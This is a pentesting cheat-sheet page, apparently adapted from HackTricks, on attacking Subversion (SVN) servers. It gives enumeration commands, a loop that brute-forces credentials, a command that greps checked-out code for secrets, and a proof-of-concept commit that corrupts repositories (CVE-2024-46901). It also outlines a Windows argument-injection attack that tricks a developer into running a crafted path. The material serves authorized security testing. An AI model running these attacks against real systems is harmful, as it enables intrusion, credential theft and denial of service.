daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

3690-pentesting-subversion-svn-server.md (5766B)


      1 ---
      2 title: "3690/tcp - Pentesting Subversion (SVN) Server"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/3690-pentesting-subversion-svn-server.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 3690/tcp - Pentesting Subversion (SVN) Server
     14 
     15 ## Basic Information
     16 
     17 **Subversion (SVN)** is a centralized **version control system** (Apache license) used for software versioning and revision control.
     18 
     19 **Default port:** `3690/tcp` (svnserve). It can also be exposed via **HTTP/HTTPS** through `mod_dav_svn` and via **svn+ssh**.
     20 
     21 ```text
     22 PORT     STATE SERVICE
     23 3690/tcp open  svnserve Subversion
     24 ```
     25 
     26 ### Banner Grabbing
     27 
     28 ```bash
     29 nc -vn 10.10.10.10 3690
     30 svnserve --version           # if shell access is obtained
     31 svn --version                # client version leak via error messages
     32 ```
     33 
     34 ## Enumeration
     35 
     36 ```bash
     37 # Anonymous / authenticated listing
     38 svn ls svn://10.10.10.203                  # list root
     39 svn ls -R svn://10.10.10.203/repo         # recursive list
     40 svn info svn://10.10.10.203/repo          # repo metadata
     41 svn log svn://10.10.10.203/repo           # commit history
     42 svn checkout svn://10.10.10.203/repo      # checkout repository
     43 svn up -r 2                               # move working copy to revision 2
     44 svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes
     45 
     46 # If served over HTTP(S)
     47 svn ls https://10.10.10.10/svn/repo --username guest --password ''
     48 
     49 # Extract revision props (often contain build creds, URLs, tokens)
     50 svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo
     51 ```
     52 
     53 ### Auth & Misconfig Hunting
     54 
     55 - `svnserve.conf` may allow `anon-access = read` (or even write). If you can list, try `checkout` to dump secrets, scripts, CI tokens.
     56 - Repositories frequently store **build pipelines**, **deployment keys**, and **database credentials** in versioned config files. Grep the working copy after checkout: `grep -R "password\|secret\|token" -n .`.
     57 - If svn+ssh is enabled, user shells often allow restricted `svnserve` commands; attempt `ssh user@host svnserve -t` with crafted subcommands to bypass wrappers.
     58 
     59 ### Bruteforcing credentials (svnserve)
     60 
     61 SASL or password-file authentication does not imply an account-lockout policy. Confirm authorization and throttling in the specific deployment before password testing, and use a small approved candidate set.<sup>[[3]](#references)</sup>
     62 ```bash
     63 for u in admin dev ci; do
     64   for p in $(cat /tmp/passlist); do
     65     svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break
     66   done
     67 done
     68 ```
     69 
     70 ## Recent Vulnerabilities (practical impact)
     71 
     72 ### mod_dav_svn DoS via control characters (CVE-2024-46901)
     73 
     74 - A user with commit rights can write a path containing control chars (e.g. `\x01`, `\x7f`) that **corrupts the repository**, making later checkouts/logs fail and potentially crashing `mod_dav_svn` workers.<sup>[[1]](#references)</sup>
     75 - Affects Subversion ≤ **1.14.4** when served through **HTTP(S)** (`mod_dav_svn`). Fixed in **1.14.5**.<sup>[[1]](#references)</sup>
     76 - PoC commit with `svnmucc` (requires valid commit creds):
     77 ```bash
     78 # create payload file
     79 printf 'pwn' > /tmp/payload
     80 # commit a path with a control character in its name
     81 svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'
     82 ```
     83 - After the commit, normal clients may crash or refuse updates until admins manually remove the revision with `svnadmin dump/filter/load`.
     84 
     85 ### Windows argument injection in svn client (CVE-2024-45720)
     86 
     87 - On Windows, "best-fit" character encoding in `svn.exe` allows **command-line argument injection** when processing specially crafted non‑ASCII paths/URLs, potentially leading to arbitrary program execution.<sup>[[2]](#references)</sup>
     88 - Affects Subversion ≤ **1.14.3** on Windows only; fixed in **1.14.4**. Attack surface: phishing a developer to run `svn` on an attacker-controlled URL/path.<sup>[[2]](#references)</sup>
     89 - Pentest angle: if you control a network share or ZIP given to a Windows dev, name a repo URL or working-copy path containing best-fit bytes that decode into `" & calc.exe & "`-style injected args, then trick the victim to run `svn status` or similar on that path.
     90 
     91 ## Notes for Exploitation Workflow
     92 
     93 1. **Check access method**: `svn://` (svnserve), `http(s)://.../svn/` (mod_dav_svn), or `svn+ssh://`.
     94 2. **Try anonymous read** first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere.
     95 3. **Enumerate hooks**: `hooks/pre-commit`, `post-commit` scripts sometimes contain plaintext credentials or hostnames.
     96 4. **Leverage `svn:externals`** to pull additional paths from other hosts; list them with `svn propget svn:externals -R .` after checkout.
     97 5. **Version leaks**: HTTP response headers from `mod_dav_svn` may expose the Subversion and Apache versions; compare confirmed versions with the applicable advisories rather than treating a banner as proof.<sup>[[1]](#references)[[2]](#references)</sup>
     98 6. If you obtain filesystem access to the repo, `svnadmin dump`/`svnlook author`/`svnlook dirs-changed` allow offline analysis without credentials.
     99 
    100 ## References
    101 
    102 - [1] [Apache Subversion security advisory CVE-2024-46901](https://subversion.apache.org/security/CVE-2024-46901-advisory.txt)
    103 - [2] [Apache Subversion security advisory CVE-2024-45720](https://subversion.apache.org/security/CVE-2024-45720-advisory.txt)
    104 - [3] [Apache Subversion book — svnserve authentication](https://svnbook.red-bean.com/en/1.8/svn.serverconfig.svnserve.html)